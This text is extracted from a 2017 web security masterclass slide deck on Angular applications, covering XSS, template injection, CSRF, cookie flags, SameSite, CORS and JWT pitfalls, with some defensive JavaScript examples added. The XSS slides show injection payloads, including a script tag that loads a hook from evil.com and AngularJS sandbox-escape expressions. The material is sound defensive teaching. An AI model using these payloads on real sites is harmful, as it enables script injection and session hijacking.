![Page 1: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/1.jpg)
@PhilippeDeRyck
SECURE YOUR CODE
Philippe De Ryck
Masterclass, ScaleUp Porto, May 2017
https://www.websec.be
ANGULAR APPLICATIONS RUN WITHIN THE BROWSER
[Diagram: the browser loads the application (JS code and HTML code); the JS application and the HTML template run inside the browser and fetch raw data from the API]
ABOUT ME – PHILIPPE DE RYCK
§ My goal is to help you build secure web applications
− Hosted and customized in-house training
− Specialized security assessments of critical systems
− Threat landscape analysis and prioritization of security efforts
− More information and resources on https://www.websec.be
§ I have a broad security expertise, with a focus on Web Security
− PhD in client-side web security
− Main author of the Primer on client-side web security
§ Part of the organizing committee of SecAppDev.org
− Week-long course focused on security for developers
CROSS-SITE SCRIPTING (XSS)
XSS REFRESHER
<p>Welcome <b><?php echo $username ?></b></p>
https://websec.be/?username=Philippe
<p>Welcome <b>Philippe</b></p>
Rendered: Welcome Philippe
https://websec.be/?username=<blink>dude</blink>
<p>Welcome <b><blink>dude</blink></b></p>
Rendered: Welcome dude
https://websec.be/?username=pwned<script src="//evil.com/hook.js"></script>
<p>Welcome <b>pwned<script src="//evil.com/hook.js"></script></b></p>
Rendered: Welcome pwned
SERVER-SIDE DEFENSES AGAINST XSS
<p>Welcome <b><?php echo htmlentities($username) ?></b></p>
<p>Welcome <b><?php echo $username ?></b></p>
<script>var username = "<?php echo $username ?>";</script>
<p class="<?php echo $status ?>">Welcome <b style="color: <?php echo $color ?>"><?php echo $username ?></b></p>
<p>Welcome <b><blink>dude</blink></b></p>
ANGULAR MAKES IT A LOT LESS PAINFUL
<p>Welcome <b>{{username}}</b></p>
https://websec.be/?username=<blink>dude</blink>
<p>Welcome <b><blink>dude</blink></b></p>
Rendered: Welcome <blink>dude</blink>
https://websec.be/?username=<script>alert('no!')</script>
<p>Welcome <b><script>alert('no!')</script></b></p>
Rendered: Welcome <script>alert('no!')</script>
EVEN WHEN YOU ACTUALLY NEED SANITIZATION
<p>Welcome <b [innerHTML]="htmlSnippet"></b></p>
htmlSnippet = "<blink>dude</blink>"
<p>Welcome <b><blink>dude</blink></b></p>
Rendered: Welcome dude
htmlSnippet = "pwned<script src="//evil.com/hook.js"></script>"
<p>Welcome <b>pwned</b></p>
Rendered: Welcome pwned
RESPECT THE AUTHORITY OF THE SANITIZER
§ Sanitization is enabled by default when you bind HTML into the DOM
− The majority of you will not even notice the sanitizer at work, which is great!
− Make sure you do this via Angular, not by directly calling the DOM API
§ There is a way to bypass sanitization, but it should be used with care
− Only intended to mark static snippets of code as safe, hence the name
bypassSecurityTrustHtml()
bypassSecurityTrustScript()
bypassSecurityTrustStyle()
bypassSecurityTrustUrl()
bypassSecurityTrustResourceUrl()
TAKEAWAY #1
ANGULAR ALREADY PROTECTS YOU AGAINST XSS,JUST GET OUT OF THE WAY
§ Angular does a pretty good job protecting you from injection attacks
− Simple data bindings are automatically escaped by Angular
− Data bindings that can result in code injection are automatically sanitized
§ Your job is to stay out of the way, and let Angular do its job
− Do not inject untrusted code into server-side templates
− Do not directly use DOM APIs to bind this data, but use built-in mechanisms
− Only use the sanitizer bypass for static data, which has been verified to be secure
§ Complementary to this, you can deploy Content Security Policy
− Allows you to lock down the power of the attacker, in case an attack happens
TRICKING ANGULAR INTO MISBEHAVING
<script src="…/angular.js"></script>
<p>Welcome <b><?php echo htmlentities($username) ?></b></p>
https://websec.be/?username=Philippe{{constructor.constructor('alert(1)')}}
<p>Welcome <b>Philippe{{constructor.constructor('alert(1)')}}</b></p>
Rendered: Welcome Philippe
TRICKING ANGULAR INTO MISBEHAVING
https://websec.be/orderBy.html#field=name
https://blogs.synopsys.com/software-integrity/2016/12/28/angularjs-1-6-0-sandbox/
https://websec.be/orderBy.html#field={{constructor.constructor('alert(…)')}}
VARIOUS WAYS TO CONTROL TEMPLATES IN ANGULAR 1
https://docs.angularjs.org/guide/security
THERE’S NO SAFE WAY TO DO THIS WITH ANGULAR 1…
http://angularjs.blogspot.be/2016/09/angular-16-expression-sandbox-removal.html
BUT ANGULAR 2 OFFERS AHEAD-OF-TIME COMPILATION
§ The offline compiler turns the application into executable code
− The compiler is not even available anymore in the browser
− Data bindings are already resolved, and encoded into the JS bundle
§ AOT compilation effectively stops template injection attacks
− At the moment of injection, the application is already compiled
− The injected template code will simply be rendered, not executed
var currVal_6 = __WEBPACK_IMPORTED_MODULE_2__angular_core_src_linker_view_utils__["inlineInterpolate"](1, '\n ', this.context.MyAOTBinding, '\n');
TAKEAWAY #2
NEVER PASS UNTRUSTED DATA TO THE COMPILER
§ Combining Angular with other technologies can result in template injection
− Dynamically generated server-side pages (PHP, JSP, …)
− Client-side libraries that run before Angular does (jQuery, ...)
§ This is actually a big problem in Angular 1.x applications
− The expression sandbox tried to fix this, but it turned out to be too hard to get right
− Never feed untrusted data to the compiler
§ Angular 2's AOT allows you to compile your templates directly into the JS files
− Removes client-side processing of templates, thus removes injection attacks
− Additional incentive: AOT gives you a massive performance improvement
“COOKIES VS TOKENS”
https://www.quora.com/How-can-I-use-session-management-if-I-am-using-AngularJS-in-client-side-and-web-API-to-supply-data-to-it-What-is-the-architecture-to-build-a-complete-application-when-I-am-using-the-new-client-side-frameworks-to-build-a-web-app
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
OWASP Top 10 (2013):
1. Injection
2. Broken Authentication and Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross-Site Request Forgery
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects and Forwards
OWASP Top 10 (2017 release candidate):
1. Injection
2. Broken Authentication and Session Management
3. Cross-Site Scripting (XSS)
4. Broken Access Control
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Insufficient Attack Protection
8. Cross-Site Request Forgery
9. Using Components with Known Vulnerabilities
10. Underprotected APIs
SESSION MANAGEMENT IN THREE PROPERTIES
§ Transport mechanism
− How is the session data being sent between the client and server?
− Two common approaches here are cookies and the Authorization header
§ Locality
− Is the session data being stored on the server or on the client?
− The latter is more common in Angular applications, but more tricky than it seems
§ Representation
− In which format is the session data that is transmitted represented?
− This used to be a session identifier, but today, we have JWT and custom formats
COOKIE FLAGS PATCH COOKIE BEHAVIOR
§ The behavior of cookies is incompatible with the Same Origin Policy
− Cookies are associated with a host, not an entire origin
− Cookies can be set for an entire domain
− Cookies can be accessed from JavaScript
§ This behavior can be slightly patched with cookie flags
− Cookies can be marked as Secure, so that they will only be used on HTTPS connections
− Cookies can be marked as HttpOnly, so that they will not be accessible from JavaScript
§ These discrepancies allow targeted attacks against specific cookies
− Overwriting of Secure or HttpOnly cookies
− Cookie jar overflow attacks to push out cookies from the store
− …
Set-Cookie: SSID=1234; Secure; HttpOnly
Cookie: SSID=1234
COOKIE PREFIXES TAKE IT A STEP FURTHER
§ The recently proposed cookie-prefix spec tries to restrict cookie behavior
− Cookie names can be prefixed with an attribute, enforcing strict behavior
§ The __Secure- prefix restricts a cookie to secure connections only
− It cannot be set over an insecure connection
− It cannot be set if the Secure flag is missing
§ The __Host- prefix restricts a cookie to a specific host
− It will only be sent to a host, never to a domain
− It must be set for the root path (/) and with the same properties as the __Secure- prefix
§ Enforcement depends on browser behavior
− Currently supported in all modern browsers (Chrome, Firefox, Opera, Edge, Safari)
https://tools.ietf.org/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2
THE UNDERESTIMATED THREAT OF CSRF
[Diagram: on websec.be the user logs in as Philippe (welcome page) and asks to show messages (latest messages); a page on anysite.io (show obligatory cat pics, kittens from hell) makes the browser send the same request to websec.be, carrying Philippe's session cookie]
THE ESSENCE OF CSRF
§ CSRF exists because the browser handles cookies very liberally
− They are automatically attached to any outgoing request
− By default, there's no mechanism to indicate the intent of a request
§ Many applications are unaware that any context can send requests
− The session cookies will be attached automatically by the browser
− Defending against CSRF requires explicit action by the developer
§ Because of its subtle nature, CSRF is a common vulnerability
− Illustrated by cases at Google, Facebook, eBay, …
− Ranked #8 on OWASP top 10 (2013)
TAKING CONTROL OF YOUR HOME NETWORK WITH CSRF
http://arstechnica.com/security/2014/03/hackers-hijack-300000-plus-wireless-routers-make-malicious-changes/
https://threatpost.com/pharming-attack-targets-home-router-dns-settings/111326
TRADITIONAL CSRF DEFENSE WITH HIDDEN FORM TOKENS
[Diagram: on websec.be the user logs in as Philippe (welcome page) and posts a message (sure thing, Philippe); the page on anysite.io (show obligatory cat pics, kittens from hell) cannot post, because its forged request lacks the hidden token]
<input type="hidden" name="csrftoken" value="1234abc" />
DEFENDING AGAINST CSRF ATTACKS
§ CSRF exists because the server does not realize requests can be unintentional
− HTML elements on any page can trigger a seemingly legitimate request
− Defenses are likely to be absent, unless you explicitly know about this problem
− Only very few frameworks offer out-of-the-box protection against CSRF
§ Common defense strategy is to use a hidden token
− The token is embedded in the form by the server, and submitted as a hidden field
− Other contexts will not be able to access the token because of the SOP
§ Hidden form tokens are not very Angular-esque
− How do you even deal with hidden tokens in a JSON API?
TRANSPARENT TOKENS AGAINST CSRF ATTACKS
[Diagram: on websec.be the user logs in as Philippe (welcome, Philippe) and posts a message (sure thing, Philippe); the page on anysite.io (show obligatory cat pics, kittens from hell) cannot post, because it cannot read the cookie and therefore cannot set the matching header]
POST …
Cookie: SID=123; XSRF-TOKEN=abc
X-XSRF-TOKEN: abc
Cookie value is copied to a header by JavaScript code
ANGULARJS SUPPORTS TRANSPARENT TOKENS BY DEFAULT
https://docs.angularjs.org/api/ng/service/$http
https://angular.io/docs/ts/latest/guide/security.html
ALTERNATIVE CSRF DEFENSE: SAMESITE COOKIES
[Diagram: on websec.be the user logs in as Philippe (welcome page) and posts a message (sure thing, Philippe); the page on anysite.io (show obligatory cat pics, kittens from hell) cannot post, because the browser does not attach the SameSite cookie to its cross-site request]
Set-Cookie: SSID=1234; SameSite=Strict
https://tools.ietf.org/html/draft-west-first-party-cookies-07
THE SAMESITE COOKIE ATTRIBUTE
§ The SameSite attribute actually supports a strict and lax mode
− In strict mode, the browser will never attach the cookie to a cross-site request
• This is determined based on the registered domain, not the origin
− In lax mode, the cookie will be present on safe top-level navigations
• e.g. a GET request that results in a navigation of the context
§ The default setting for the SameSite attribute is strict mode
− This is the mode you get when you simply add SameSite to the cookie
− This will stop all CSRF attacks
§ Adding the SameSite attribute in lax mode will stop most CSRF attacks
− Unless the attack can be launched with a GET request
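The cookie flags, cookie prefixes and SameSite slides each add a rule for a session cookie; the following added example (not part of the deck) turns those rules into a single linter for a `Set-Cookie` header, which is a handy check in an integration test against your own backend. The wording of the findings and the `issuedOverHttps` parameter are assumptions; `SameSite` without a value is read as strict, as the slides state.

```javascript
// Added example (not from the slides): lint a Set-Cookie header for a session
// cookie against the flag, prefix and SameSite recommendations.

// Parse "NAME=value; Attr; Attr=val" into { name, value, attrs }.
// Attribute names are lower-cased; valueless attributes map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim());
  const eq = parts[0].indexOf('=');
  if (eq < 0) throw new Error('invalid Set-Cookie: missing name=value');
  const cookie = { name: parts[0].slice(0, eq).trim(), value: parts[0].slice(eq + 1), attrs: {} };
  for (const part of parts.slice(1)) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i < 0 ? part : part.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i < 0 ? true : part.slice(i + 1).trim();
  }
  return cookie;
}

// Returns a list of findings; an empty list means the header follows every
// recommendation from the slides.
function lintSessionCookie(header, issuedOverHttps = true) {
  const c = parseSetCookie(header);
  const findings = [];
  const secure = c.attrs.secure === true;
  const httpOnly = c.attrs.httponly === true;
  const sameSite = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : c.attrs.samesite;

  // Cookie flags (slide "cookie flags patch cookie behavior").
  if (!secure) findings.push('missing Secure: cookie will also be sent over plain HTTP');
  if (!httpOnly) findings.push('missing HttpOnly: cookie is readable from JavaScript');
  if (c.attrs.domain !== undefined) findings.push('Domain set: cookie is shared with all subdomains');

  // SameSite (slide "the SameSite cookie attribute"): a bare SameSite means strict,
  // lax still lets the cookie ride along on top-level GET navigations.
  if (c.attrs.samesite === undefined) {
    findings.push('missing SameSite: browser will attach the cookie to cross-site requests');
  } else if (sameSite === 'lax') {
    findings.push('SameSite=Lax: cookie is still sent on top-level GET navigations');
  } else if (sameSite !== true && sameSite !== 'strict') {
    findings.push(`unknown SameSite value: ${c.attrs.samesite}`);
  }

  // Cookie prefixes (slide "cookie prefixes take it a step further"): the browser
  // enforces these, so a violation means the cookie is silently dropped.
  const isHost = c.name.startsWith('__Host-');
  const isSecurePrefix = c.name.startsWith('__Secure-');
  if (isHost || isSecurePrefix) {
    if (!secure) findings.push('prefix requires the Secure flag');
    if (!issuedOverHttps) findings.push('prefix requires the cookie to be set over HTTPS');
  }
  if (isHost) {
    if (c.attrs.domain !== undefined) findings.push('__Host- cookies must not have a Domain attribute');
    if (c.attrs.path !== '/') findings.push('__Host- cookies must be set with Path=/');
  } else if (!isSecurePrefix) {
    findings.push('no cookie prefix: consider __Host- to bind the cookie to this host');
  }
  return findings;
}
```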
BROWSER SUPPORT FOR SAMESITE COOKIES
http://caniuse.com/#search=samesite
CSRF IN AN API WORLD
§ HTTP requests generated from HTML elements are very constrained
− They cannot generate requests with arbitrary content types
− They cannot set custom request headers
§ Traditional CSRF is not a problem for APIs that reject such HTTP requests
− HTML elements cannot generate valid HTTP requests to your backend
− XHR gives you more freedom, but then Cross-Origin Resource Sharing comes into play
§ The CORS spec is designed to prevent additional CSRF attack vectors
− XHR requests that mimic the possibilities from HTML elements can trigger CSRF
• But your API rejects them anyway
− More complex XHR requests require approval by the server first
• If you enable CORS, then you can check the Origin header to see where the request comes from
WHEN CORS COMES INTO PLAY, CHECK THE ORIGIN HEADER
[Diagram: a post-message request from websec.be (sure thing, Philippe) is accepted, while the same request triggered from anysite.io (show obligatory cat pics, kittens from hell) is rejected based on its Origin header]
Origin: https://websec.be
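The two checks from the "CSRF in an API world" and "check the Origin header" slides combined into one request filter for a JSON API, as an added example that is not part of the deck: anything an HTML element could have produced is rejected by content type, and what remains is a non-simple CORS request whose `Origin` header the browser always sets. The allow list of origins and the CORS response headers are assumptions for this example.

```javascript
// Added example (not from the slides): request filter for a cookie-authenticated
// JSON API. Assumes Node.js with lower-cased header names.
const ALLOWED_ORIGINS = new Set(['https://websec.be']);  // constructed allow list

// Content types that an HTML <form> can submit without any CORS approval.
const FORM_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);

// "application/json; charset=utf-8" -> "application/json"
function mediaType(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

// Decide whether a request to a state-changing endpoint may proceed.
// Returns { allowed, reason } so that the reason can be logged for detection.
function checkApiRequest(method, headers) {
  const m = method.toUpperCase();
  if (m === 'GET' || m === 'HEAD' || m === 'OPTIONS') return { allowed: true, reason: 'safe method' };

  // 1. The API only speaks JSON, which HTML elements cannot produce. Rejecting
  //    everything else closes the classic form-based CSRF vector.
  const type = mediaType(headers['content-type']);
  if (type !== 'application/json') {
    const reason = FORM_CONTENT_TYPES.has(type)
      ? 'form-encoded request rejected'
      : `unsupported content type: ${type || '(none)'}`;
    return { allowed: false, reason };
  }

  // 2. A JSON request from a browser is a non-simple CORS request, so the browser
  //    attaches the Origin header. Compare it against the allow list; a missing
  //    header or the opaque value "null" is treated as untrusted.
  const origin = headers['origin'];
  if (!origin || origin === 'null') return { allowed: false, reason: 'missing or opaque Origin' };
  if (!ALLOWED_ORIGINS.has(origin.toLowerCase())) return { allowed: false, reason: `origin not allowed: ${origin}` };
  return { allowed: true, reason: 'json request from allowed origin' };
}

// CORS headers for a preflight or actual response. Only an allowed origin is
// echoed back; never "*" together with credentials.
function corsHeadersFor(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin.toLowerCase())) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Headers': 'Content-Type, X-XSRF-TOKEN',
    'Access-Control-Allow-Methods': 'GET, POST, PUT, DELETE',
    'Vary': 'Origin',
  };
}
```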
THE AUTHORIZATION HEADER AS AN ALTERNATIVE TO COOKIES
THE RESURRECTION OF THE AUTHORIZATION HEADER
§ The Authorization header has become popular again in the last few years
− Often used to send access tokens in an OAuth 2.0 flow
− It's a header, so you can easily use it to transmit session data as well
− The header is well known, so unlikely to be stripped by proxies and middleboxes
§ The browser does not handle the header automatically
− The application will need to do its own session management from JavaScript
− The session data will have to be stored by the application as well
− Well-supported by numerous frameworks and libraries
Authorization: Bearer eyJ2aWV3cyI6MTR9
ADDING THE AUTHORIZATION HEADER IN ANGULARJS
https://www.toptal.com/web/cookie-free-authentication-with-json-web-tokens-an-example-in-laravel-and-angularjs
Careful where you send your session information to!
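The warning above is about an interceptor that blindly adds the header to every outgoing request; this added example (not from the deck, and framework-agnostic rather than an AngularJS interceptor) resolves the target URL the way the browser would and attaches the bearer token only to the API origins it knows. The API origins and the page origin used to resolve relative URLs are assumptions.

```javascript
// Added example (not from the slides): attach the Authorization header only to
// requests bound for the application's own API origins.
const API_ORIGINS = new Set(['https://websec.be', 'https://api.websec.be']); // constructed
const PAGE_ORIGIN = 'https://websec.be'; // constructed; window.location.origin in a browser

// Resolve relative, protocol-relative and absolute URLs like the browser does and
// return the origin, or null when the URL cannot be parsed.
function targetOrigin(url) {
  try {
    return new URL(url, PAGE_ORIGIN).origin;
  } catch (e) {
    return null;
  }
}

// Returns a new headers object; Authorization is added only for allowed origins.
// Third-party hosts, look-alike hosts (api.websec.be.evil.com) and an http://
// downgrade of the API host all keep the headers untouched.
function withAuthorization(url, headers, token) {
  const origin = targetOrigin(url);
  if (!origin || !API_ORIGINS.has(origin)) return { ...headers };
  return { ...headers, Authorization: `Bearer ${token}` };
}
```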
STORING SESSION DATA IN THE BROWSER
In-memory:
− Does not survive a page reload
− Can be shielded from malicious code
− Available to running code only
SessionStorage:
− Survives a page reload
− Can be somewhat shielded from malicious code
− Available to the entire tab
LocalStorage:
− Survives a page reload
− Cannot be shielded from malicious code
− Available to the entire origin
THE AUTHORIZATION HEADER VS COOKIES
Cookies vs the Authorization header:
− Cookies: almost always an enabler of CSRF. Authorization header: enabling CSRF with the Authorization header requires serious programming errors.
− Cookies: can be hidden from malicious JavaScript. Authorization header: availability to JavaScript depends on the storage mechanism.
− Cookies: can contain any kind of data. Authorization header: can contain any kind of data.
− Cookies: are attached automatically, to all requests. Authorization header: is not present on browser-generated requests.
− Cookies: are always associated with one domain. Authorization header: is under your control, and can be attached to any request.
TAKEAWAY #3
THE TRANSPORT MECHANISM FOR SESSION DATA HAS A BIG IMPACT
§ The question "cookies vs tokens" does not really make sense
− Cookies combine transport with storage, but can contain any kind of data
− Tokens can be just about anything
− Both mechanisms support server-side and client-side session management
§ Cookies are well-supported by browsers, but have their quirks
− Enable the appropriate flags and prefixes to patch browser behavior
− Be aware of CSRF attacks against your backend
• This does not apply if you have a CORS-protected API
§ Client-side sessions with tokens are often considered mandatory in Angular
− Moving towards tokens requires custom session management, which is hard
− Incompatible with many scenarios on the web (CORS, DOM-based requests, …)
http://jwt.io/
A JWT IS A BASE64-ENCODED DATA OBJECT
Header:
{"alg": "HS256", "typ": "JWT"}
Payload:
{"iss": "distrinet.cs.kuleuven.be", "exp": 1425078000000, "name": "philippe", "admin": true}
Signature:
HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), "secret")
Token (header.payload.signature):
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaXN0cmluZXQuY3Mua3VsZXV2ZW4uYmUiLCJleHAiOjI0MjUwNzgwMDAwMDAsIm5hbWUiOiJwaGlsaXBwZSIsImFkbWluIjp0cnVlfQ.dIi1OguZ7K3ADFnPOsmX2nEpF2Asq89g7GTuyQuN3so
USING JWTS IN PRACTICE
§ JWT tokens are a way to represent claims between parties
− Common use is to represent session data and store it on the client
− In the default scenario, JWTs are signed using an HMAC with a server-side secret
− The signature can be used to ensure the integrity of the token on the next request
§ Generating and verifying JWT tokens is a backend responsibility
− The signature is based on the claims in the token
− In theory, the client could decode the JWT and extract information about the claims
− In practice, it is cleaner to provide this information separately
§ Client-side application needs to ensure that the JWT is present on requests
− This can be in a cookie, or in the Authorization header
THERE IS A LOT MORE TO A JWT TOKEN
§ JWT is an open standard to exchange information
− Part of a JSON-based Identity Protocol Suite
− Used by OpenID Connect, on top of OAuth 2.0
§ Signatures are essential to ensure the integrity of JWT tokens
− The spec actually allows JWT tokens without signatures, but this is actively discouraged
− Most common are signatures with one shared key, for use within one application
− Alternatively, the JWT is signed with a private key, and can be verified with a public key
§ Other specifications cover additional cryptographic support
− JSON Web Signatures (JWS)
− JSON Web Encryption (JWE)
− JSON Web Key (JWK)
JWTSIGNATURES WITHIN ONE APPLICATION
[Diagram: the JWT is issued and later verified by the same application, using one shared key]
JWTSIGNATURES ACROSS APPLICATIONS
[Diagram: the JWT is signed by the issuing application with its private key and verified by another application with the matching public key]
JWTS ARE YOUNG, AND SUFFER FROM GROWING PAINS
§ Integrity and confidentiality require the use of crypto
− Crypto is hard, and JWT libraries have had some implementation issues
§ A major part of the problem is that the attacker can control the header
− The header contains information about the algorithms that are used
− So it needs to be trusted before the integrity of the token can be verified
§ Practical attacks that have been discovered in the past
− Generating arbitrary tokens using the "none" algorithm
− Generating arbitrary tokens by confusing the server between HMAC and public keys
− Extracting the encryption key by manipulating elliptic curve parameters
https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
http://blogs.adobe.com/security/2017/03/critical-vulnerability-uncovered-in-json-encryption.html
TAKEAWAY #4
JWTS ARE WELL SUPPORTED,BUT REQUIRE CONSTANT SUPERVISION
§ JWTs have become a popular way to represent claims
− Heavily used in OpenID Connect to exchange identity information
− Often recommended as the preferred way to do session management in Angular
§ Avoid these common mistakes when using JWT tokens in your application
− Verify the integrity of the token in the backend before using any of its data
− Use the right signing mechanism (HMAC vs public signatures)
− Avoid client-side dependencies on the contents of the token
§ Unfortunately, JWTs seem to be repeating history
− A lot of mistakes are made, very similar to the early days of XML
− Make sure you use common libraries, and aggressively keep them up to date
TAKEAWAY #4
JWTS ARE WELL SUPPORTED,BUT REQUIRE CONSTANT SUPERVISION
TAKEAWAY #3
THE TRANSPORT MECHANISM FOR SESSION DATA HAS A BIG IMPACT
TAKEAWAY #1
ANGULAR ALREADY PROTECTS YOU AGAINST XSS,JUST GET OUT OF THE WAY
TAKEAWAY #2
NEVER PASS UNTRUSTED DATA TO THE COMPILER
NOW IT’S UP TO YOU …
Secure ShareFollow
https://www.websec.be [email protected] /in/philippederyck